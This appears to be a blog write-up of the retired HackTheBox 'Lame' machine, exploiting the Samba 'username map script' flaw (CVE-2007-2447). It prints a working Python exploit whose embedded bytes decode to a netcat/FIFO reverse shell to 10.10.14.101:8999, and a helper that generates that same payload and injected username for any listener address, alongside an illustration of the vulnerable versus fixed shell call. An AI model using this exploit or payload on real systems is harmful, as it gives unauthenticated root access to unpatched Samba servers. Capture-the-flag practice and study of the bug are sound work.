HackTheBox “Lame” With & Without Metasploit WriteUp

Abdullah Kareem
3 min read · Apr 17, 2022

Lame is a beginner level machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

Scanning:

Our port scan shows both vsftpd and Samba. Let's see if we can get something from Samba, since we failed to get anything from vsftpd:

Exploitation:

  • Using Metasploit method: the exploit/multi/samba/usermap_script module (the Rapid7 page linked below) does the same thing for us.
  • Using Non-Metasploit Method:

After searching Google for a manual way, we find the script below:

script: https://raw.githubusercontent.com/v1nc3-source/Samba_3.x_4.x_exploit/main/smb3exploit.py

```python
#!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False   # force SMB1: Samba 3.0.x speaks nothing else
import sys
# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html

# Use the commandline argument as the target:
if len(sys.argv) < 2:
    print("\nUsage: " + sys.argv[0] + " <HOST>\n")
    sys.exit()

# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=tun0 LPORT=8999 -f python
# These bytes are plain ASCII and decode to:
#   mkfifo /tmp/fbnrig; nc 10.10.14.101 8999 0</tmp/fbnrig | /bin/sh >/tmp/fbnrig 2>&1; rm /tmp/fbnrig
# i.e. a reverse shell to 10.10.14.101:8999, the tun0 address of whoever ran msfvenom.
# Replace them with bytes for your own LHOST/LPORT before running the script.
buf = b""
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x66"
buf += b"\x62\x6e\x72\x69\x67\x3b\x20\x6e\x63\x20\x31\x30\x2e"
buf += b"\x31\x30\x2e\x31\x34\x2e\x31\x30\x31\x20\x38\x39\x39"
buf += b"\x39\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x66\x62\x6e\x72"
buf += b"\x69\x67\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
buf += b"\x3e\x2f\x74\x6d\x70\x2f\x66\x62\x6e\x72\x69\x67\x20"
buf += b"\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70"
buf += b"\x2f\x66\x62\x6e\x72\x69\x67"

# The command goes in the username, wrapped in backticks so that the shell which
# runs the "username map script" evaluates it; nohup keeps it alive afterwards.
username = "/=`nohup " + buf.decode() + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU", "METASPLOITABLE", use_ntlm_v2=False)
assert conn.connect(sys.argv[1], 445)
```

This script exploits a command execution vulnerability (CVE-2007-2447) in Samba versions 3.0.20 through 3.0.25rc3 when the non-default "username map script" configuration option is in use. By specifying a username containing shell metacharacters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability, since this option is used to map usernames prior to authentication (source: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script ).
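To make the bug class concrete, here is an added illustration written for this write-up; it is neither Samba's source nor the exploit script above. It models what smbd did with the client-supplied username: the configured map script was run through the shell with the name pasted into the command line, before any authentication. `echo` stands in for the map script and the probe usernames are constructed; the vulnerable and the fixed variants are shown side by side.

```python
#!/usr/bin/env python3
"""Added illustration of the "username map script" bug (CVE-2007-2447).

Example code written for this write-up: it is neither Samba's source nor
the exploit script above. It mimics what Samba 3.0.20 to 3.0.25rc3 did:
the configured script was run through /bin/sh -c with the client-supplied
username pasted into the command line, before any authentication happened.
The "map script" here is just `echo` (a constructed stand-in), so whatever
it prints is what smbd would have taken as the mapped Unix username.
"""
import subprocess

# Stand-in for the admin's "username map script" (hypothetical). A real one
# would print the Unix account that the given Windows name maps to.
MAP_SCRIPT = "echo"


def map_user_vulnerable(username: str) -> str:
    """Old behaviour: one command string, handed to the shell (smbrun()).

    Samba 3.0.x wrapped the name in double quotes. That neutralises ';'
    and '|', but backticks and $(...) still expand inside double quotes,
    which is why the exploit above puts its command in backticks.
    """
    cmd = f'{MAP_SCRIPT} "{username}"'
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout.strip()


def map_user_fixed(username: str) -> str:
    """Safe behaviour: pass the username as its own argv element, no shell.

    Metacharacters stay literal bytes of the argument and reach the script
    unchanged, so the client cannot choose what smbd executes.
    """
    proc = subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True)
    return proc.stdout.strip()


if __name__ == "__main__":
    # Benign probes (constructed): if the backticks or $(...) are evaluated,
    # printf runs and its output replaces them in the "mapped" name.
    for probe in ("/=`printf INJECTED`", "/=$(printf INJECTED)", "x; printf SECOND"):
        print(f"{probe!r:24} vulnerable -> {map_user_vulnerable(probe)!r:22} "
              f"fixed -> {map_user_fixed(probe)!r}")
```

Run it and compare the two columns: the backtick and `$(...)` probes come back as `/=INJECTED` from the vulnerable path and unchanged from the fixed one, while the `;` probe is harmless in both, which shows why the exploit relies on command substitution rather than a command separator.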

First we generate our own payload with msfvenom (the exact command is in the script's comment, with our tun0 address as LHOST) and replace the byte string inside the script with it:

Then we start a listener on the LPORT we chose:

Now we run the exploit script against the target, with the shellcode edited to the one we generated:

Checking our listener, we can see that we got a connection, and it is a root shell, because the injected command runs inside the smbd process:
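Before running any payload-bearing script pulled from GitHub, read what its bytes actually run: the buf embedded in this one already points at 10.10.14.101:8999, the tun0 address of whoever generated it, so leaving it in place would hand the root shell to whoever holds that address on the VPN. The helper below is added for this write-up (it is not part of the exploit script and not msfvenom): it decodes the embedded `-f python` bytes, builds the same netcat/FIFO reverse shell for your own LHOST and LPORT, and renders it back into the `buf += b"..."` lines the script expects. The FIFO name and the fallback LHOST in the `__main__` block are placeholders.

```python
#!/usr/bin/env python3
"""Added helper for the "prepare our payload" step.

Example code written for this write-up; it is not part of the exploit
script and not msfvenom. It (1) decodes the msfvenom "-f python" bytes that
ship inside the script, so you can read what the target will run before you
run anything, and (2) builds the same netcat/FIFO reverse shell for your own
LHOST and LPORT and renders it back into the buf += b"..." lines.
"""
import re

# The bytes exactly as they appear in the downloaded script.
ORIGINAL_BUF = b""
ORIGINAL_BUF += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x66"
ORIGINAL_BUF += b"\x62\x6e\x72\x69\x67\x3b\x20\x6e\x63\x20\x31\x30\x2e"
ORIGINAL_BUF += b"\x31\x30\x2e\x31\x34\x2e\x31\x30\x31\x20\x38\x39\x39"
ORIGINAL_BUF += b"\x39\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x66\x62\x6e\x72"
ORIGINAL_BUF += b"\x69\x67\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
ORIGINAL_BUF += b"\x3e\x2f\x74\x6d\x70\x2f\x66\x62\x6e\x72\x69\x67\x20"
ORIGINAL_BUF += b"\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f\x74\x6d\x70"
ORIGINAL_BUF += b"\x2f\x66\x62\x6e\x72\x69\x67"


def decode_payload(buf: bytes) -> str:
    """cmd/unix/* payloads are plain ASCII commands; \\xNN is just hex-escaped text."""
    return buf.decode("ascii")


def parse_msfvenom_python(text: str) -> bytes:
    """Read buf += b"\\x.." lines back into bytes without exec()ing them."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def netcat_fifo_shell(lhost: str, lport: int, fifo: str = "/tmp/f") -> str:
    """Same shape as cmd/unix/reverse_netcat: nc reads its input from the FIFO,
    its output is piped into /bin/sh, and the shell's output goes back into
    the FIFO. msfvenom picks a random FIFO name such as /tmp/fbnrig; the
    default here is an assumption."""
    return f"mkfifo {fifo}; nc {lhost} {lport} 0<{fifo} | /bin/sh >{fifo} 2>&1; rm {fifo}"


def to_msfvenom_python(cmd: str, width: int = 13) -> str:
    """Render a command as the buf += b"\\x.." lines that msfvenom -f python emits."""
    data = cmd.encode("ascii")
    lines = ['buf = b""']
    for i in range(0, len(data), width):
        chunk = "".join(f"\\x{b:02x}" for b in data[i:i + width])
        lines.append(f'buf += b"{chunk}"')
    return "\n".join(lines)


def exploit_username(cmd: str) -> str:
    """The username field the script sends: '/=' then the command in backticks
    under nohup, so it keeps running after the map script's shell exits."""
    return f"/=`nohup {cmd}`"


if __name__ == "__main__":
    import sys
    print("embedded payload runs:", decode_payload(ORIGINAL_BUF))
    # Placeholder defaults; pass your own tun0 address and listener port.
    lhost = sys.argv[1] if len(sys.argv) > 1 else "10.10.14.5"
    lport = int(sys.argv[2]) if len(sys.argv) > 2 else 8999
    shell = netcat_fifo_shell(lhost, lport)
    print("\nreplacement for the script's buf lines:\n" + to_msfvenom_python(shell))
    print("\nusername the script will send:", exploit_username(shell))
```

Paste the printed `buf` lines over the ones in the script, then start the listener on the same port before running it; `parse_msfvenom_python` lets you check a downloaded byte blob the same way without ever executing it.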

Good luck!

Abdullah Kareem

IT Specialist | Cyber Security Enthusiast | OSWP | eCPPT | CEH | CCNP Enterprise | CCNA | ITILv4